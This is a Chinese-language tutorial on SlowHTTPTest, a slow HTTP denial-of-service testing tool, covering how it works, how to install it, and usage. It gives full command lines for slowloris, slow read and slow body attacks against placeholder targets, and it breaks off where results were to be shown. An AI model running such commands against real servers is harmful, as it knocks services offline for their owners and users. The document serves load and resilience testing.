Slowhttptest是一個依賴於實際HTTP協議的Slow HTTP DoS攻擊工具,它的設計原理是要求服務器所有請求被完全接收后再進行處理。
SlowHTTPTest是一款對服務器進行慢攻擊的測試軟件,所謂的慢攻擊就是相對於cc或者DDoS的快而言的,並不是只有量大速度快才能把服務器搞掛,使用慢攻擊有時候也能到達同一效果。slowhttptest包含了之前幾種慢攻擊的攻擊方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么這些慢攻擊工具的原理就是想辦法讓服務器等待,當服務器在保持連接等待時,自然就消耗了資源。
Slowhttptest的源碼托管在Github:https://github.com/shekyan/slowhttptest
在Kali Linux上安裝SlowHTTPTest
# apt-get install slowhttptest
如果你使用其他linux發行版,可以從源碼編譯安裝:
$ ./configure
$ make
$ sudo make install
使用示例
man手冊:
# man slowhttptest
幫助信息中提供了很多使用示例。
slowloris模式:
# slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3
生成圖表(CSV和html格式):
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3
Slow Read模式:
# slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.com -p 5 -l 350 -e x.x.x.x:8080
x.x.x.x:8080是HTTP代理
實際測試
Slow Body攻擊:
# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3
攻擊開始,服務器端在幾秒內的變化:
